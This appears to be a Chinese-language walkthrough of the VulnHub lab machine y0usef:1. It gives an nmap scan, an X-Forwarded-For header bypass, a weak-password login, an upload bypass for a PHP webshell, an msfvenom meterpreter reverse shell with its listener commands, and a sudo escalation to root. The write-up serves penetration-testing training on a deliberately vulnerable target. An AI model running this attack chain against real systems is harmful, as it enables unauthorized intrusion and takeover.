一、靶场介绍
1.下载地址:https://www.vulnhub.com/entry/y0usef-1,624/
2.将靶机网络适配器改为桥接模式
3.VirtualBox中启动靶机
二、信息收集
1.主机发现
nmap -sP 192.168.3.0/24 | grep -B 2 -A 0 "VirtualBox"
2.端口扫描
nmap -sV -A -T4 -p- 192.168.3.61
3.目录扫描
4.网页访问,显示没有权限
三、渗透流程
1.尝试利用BP绕过,成功绕过
X-Forwarded-For: 127.0.0.1
2.放包,查看网页
3.尝试弱口令爆破,admin/admin登录成功,发现文件上传点
4.经过测试,发现可以上传.png文件,上传php文件,再通过BP修改文件类型
上传成功
浏览器中访问,成功
5.使用蚁剑连接
6.kali生成木马,上传到靶机
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.3.87 lport=7777 R > 2.php
7.kali开启msf监听
msfconsole
use exploit/multi/handler
set lhost 192.168.3.87
set lport 7777
set payload php/meterpreter/reverse_tcp
run
shell
python -c 'import pty; pty.spawn("/bin/bash")'
8.在/home下的user.txt中发现一段加密后编码
9.对编码进行解码
user:yousef
pass:ypusef123
10.通过ssh登录yousef用户
11.查看当前用户权限
sudo -l
12.直接登录到root,提权成功